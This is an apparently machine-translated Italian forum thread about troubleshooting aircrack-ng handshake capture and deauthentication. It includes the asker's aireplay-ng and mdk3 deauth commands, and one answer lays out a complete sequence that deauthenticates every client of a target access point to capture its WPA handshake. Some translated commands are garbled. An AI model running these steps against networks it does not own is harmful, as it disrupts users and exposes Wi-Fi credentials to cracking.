Poche domande su aircrack-ng

1

Ciao, di recente ho iniziato a giocare con aircrack-ng e ho alcune domande.

  1. Quando inizio con l'intero processo di attivazione della modalità monitor, faccio l'opposto airmon-ng stop wlan0 e ascolto con airodump-ng wlan0 . Lo faccio perché quando ascolto con airodump-ng mon0 (dopo i airmon-ng start wlan0 ovviamente) non riesco a ottenere una stretta di mano, e con wlan0 posso. È normale o mi manca qualcosa?
  2. Ho letto sul loro sito Web che ci sono alcune schede wireless che possono solo ascoltare i pacchetti e non possono iniettarli. Non riesco a smagrire un utente su una rete, quindi mi chiedo se si tratta di un problema con la mia scheda o sto facendo qualcosa di sbagliato? Ho provato a deauth in diversi modi:
    • aireplay-ng -0 0 -a *BSSID* wlan0
    • aireplay-ng -0 0 -a *BSSID* -c *DMAC* wlan0
    • mdk3 wlan0 b -n *DMAC*

Anche quando eseguo aireplay-ng -9 wlan0 ottengo 0/30 pacchetti di successo iniettati su ogni AP.

Non riesco a determinare se la mia scheda è in grado di iniettare pacchetti. Il comando lspci -nn | grep 0280 mi dà 02: 00.0 Controller di rete [0280]: Intel Corporation Wireless 3160 [8086: 08b4] (rev 93)

    
posta b0ne 22.06.2016 - 00:27
fonte

3 risposte

1

Ok amico, ecco alcune note:

Per quanto riguarda il problema dell'handshake, dall'esperienza, potrebbe essere il seguente:

  • Non sei abbastanza vicino al router, c'è la possibilità che non acquisirai l'handshake se il client è troppo vicino all'AP e il dispositivo in modalità monitor è relativamente lontano.
  • Un problema hardware, il dispositivo di rete è vecchio e non compatibile, quindi non può acquisire pacchetti da altri protocolli. Ad esempio se il tuo dispositivo esegue 802.11ge la rete è 802.11n

Soluzione: in primo luogo, prova a catturare l'handshake da diverse posizioni fisiche, se non funziona, prova un altro dispositivo WiFi.

Nota:

Qualche risposta ai processi di kill che interferiscono con airmon-ng. Non utilizzare il comando
airmon-ng check kill perché si interrompe l'applicazione gestore di rete.

Non utilizzare il comando precedente per correggere l'errore del canale fisso -1, invece, usa i seguenti comandi quando avvii la modalità monitor:

  • airmon-ng avvia wlan0
  • ifconfig wlan0mon down
  • monitor della modalità wlan0mon iwconfig
  • ifconfig wlan0mon up
risposta data 21.08.2016 - 09:47
fonte
0

Ho un metodo semplice per fare ciò che stai tentando. Invece di usare aireplay-ng e airmon-ng, il seguente rimuoverà i problemi iniziali (o dovrebbe).

1.) iw
2.) mdk3

Anche se vedo che hai menzionato mdk3, l'attacco deauth dovrebbe funzionare con il seguente metodo.

Comandi:

ifconfig wlan0 down

... e poi,

iw wlan0 interface add mon0 type monitor

... e poi,

# Just to make sure mon0 is up.
ifconfig mon0 up

... e poi,

airodump-ng mon0

... trova il punto di accesso che desideri deauth e quindi

# Stop airodump-ng
crtl + c

# start airodump-ng on target AP.
airodump-ng mon0 --bssid (MAC here) --channel (AP channel here) --write /path/to/capfiles.pcap

... una volta che airodump-ng è in esecuzione e cattura nell'AP di destinazione, quindi esegui,

# Deauth attack.
mdk3 mon0 d -s 100 -c (AP channel here)

Per l'attacco deauth, puoi anche includere una lista bianca / nera di AP che desideri ignorare. Avrai bisogno di avere due terminali per questo semplice metodo. Dovresti solo aspettare un po 'prima che tutti i client collegati all'AP siano stupefatti. Tuttavia, tieni presente che, se non ci sono dispositivi collegati sull'AP, non sarai in grado di catturare eventuali strette di mano. Le handshake sono fatte quando un dispositivo si sta autenticando sull'AP.

Quando hai l'handshake, crtl + c per fermare mdk3 e airodump-ng. Il file cap verrà salvato nella directory specificata nell'opzione airodump-ng "--write".

Per rimuovere l'interfaccia mon0, eseguire il seguente comando:

# Remove mon0
iw mon0 del

E hai finito.

Se hai ancora problemi, non esitate a contattarmi su Facebook: Yokai Seishinkage.

(modifica) Prendete nota che ciò rimuove completamente la dipendenza dall'uso di airmon-ng, che rimuove anche i conflitti di servizio. Ma sarà comunque meglio usare questo metodo con wlan0 in basso per evitare problemi. Finora, funziona perfettamente per me.

    
risposta data 21.08.2016 - 11:22
fonte
0

Assicurati di eseguire airmon-ng check kill prima di passare alla modalità monitor per eliminare eventuali proc che potrebbero interferire con il monitoraggio. Anche nei tuoi tentativi di deauth, prova:

aireplay-ng -0 25 -a {BSSID} -c {ClientMAC} {interface}

Questo tutorial ha una buona spiegazione di come per eseguire l'attacco che stai cercando.

Consulta questo per vedere se la tua scheda è compatibile con aireplay-ng.

    
risposta data 22.06.2016 - 03:33
fonte

Leggi altre domande sui tag